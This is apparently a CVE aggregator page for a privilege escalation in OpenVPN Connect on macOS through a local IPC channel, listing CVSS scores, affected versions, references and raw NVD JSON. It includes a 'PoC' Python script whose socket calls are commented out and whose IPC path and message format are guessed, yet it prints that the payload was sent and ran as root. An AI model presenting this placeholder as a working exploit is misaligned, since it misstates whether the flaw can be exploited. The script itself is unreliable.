CVE-2026-9560

Description

Privilege escalation via background service of OpenVPN Connect 3.5.1 through 3.8.1 on macOS allows attackers to execute arbitrary commands with elevated privileges via local IPC channel

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openvpn:connect:*:*:*:*:*:macos:*:* - VULNERABLE

OpenVPN Connect 3.5.1

OpenVPN Connect 3.5.2

OpenVPN Connect 3.5.3

OpenVPN Connect 3.5.4

OpenVPN Connect 3.6.0

OpenVPN Connect 3.7.0

OpenVPN Connect 3.8.0

OpenVPN Connect 3.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-9560 (OpenVPN Connect Privilege Escalation)
This script demonstrates the concept of sending a malicious payload
via the local IPC channel to execute arbitrary commands.
"""

import socket
import struct
import sys

def send_ipc_payload(command):
    # Simulating the IPC connection to the OpenVPN background service
    # In a real scenario, the address and protocol would match the specific implementation
    IPC_ADDRESS = '/var/run/openvpn_connect_ipc' 
    
    try:
        print(f"[*] Attempting to connect to IPC service at {IPC_ADDRESS}...")
        # sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        # sock.connect(IPC_ADDRESS)
        
        # Constructing the malicious payload
        # Structure: [Command Length][Command Data]
        payload = command.encode('utf-8')
        msg = struct.pack('>I', len(payload)) + payload
        
        print(f"[*] Sending payload: {command}")
        # sock.sendall(msg)
        
        # Simulating response
        # response = sock.recv(1024)
        print("[+] Payload sent successfully.")
        print("[+] If vulnerable, the command was executed with root privileges.")
        
        # sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # The payload executes a simple command to verify root access
    # e.g., creating a file in /root or launching a shell
    target_cmd = "/bin/bash -c 'whoami > /tmp/poc_root_check.txt'"
    send_ipc_payload(target_cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9560
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9560
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9560/
[4] VulDB https://vuldb.com/cve/CVE-2026-9560
[5] https://openvpn.net/connect-docs/macos-release-notes.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9560", "sourceIdentifier": "[email protected]", "published": "2026-05-26T18:16:58.577", "lastModified": "2026-05-27T18:08:50.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Privilege escalation via background service of OpenVPN Connect 3.5.1 through 3.8.1 on macOS allows attackers to execute arbitrary commands with elevated privileges via local IPC channel"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-267"}, {"lang": "en", "value": "CWE-270"}, {"lang": "en", "value": "CWE-648"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:connect:*:*:*:*:*:macos:*:*", "versionStartIncluding": "3.5.1", "versionEndExcluding": "3.8.2", "matchCriteriaId": "8407AE06-85C9-4AE6-A3F5-ED03B9C9437E"}]}]}], "references": [{"url": "https://openvpn.net/connect-docs/macos-release-notes.html", "source": "[email protected]", "tags": ["Release Notes"]}]}}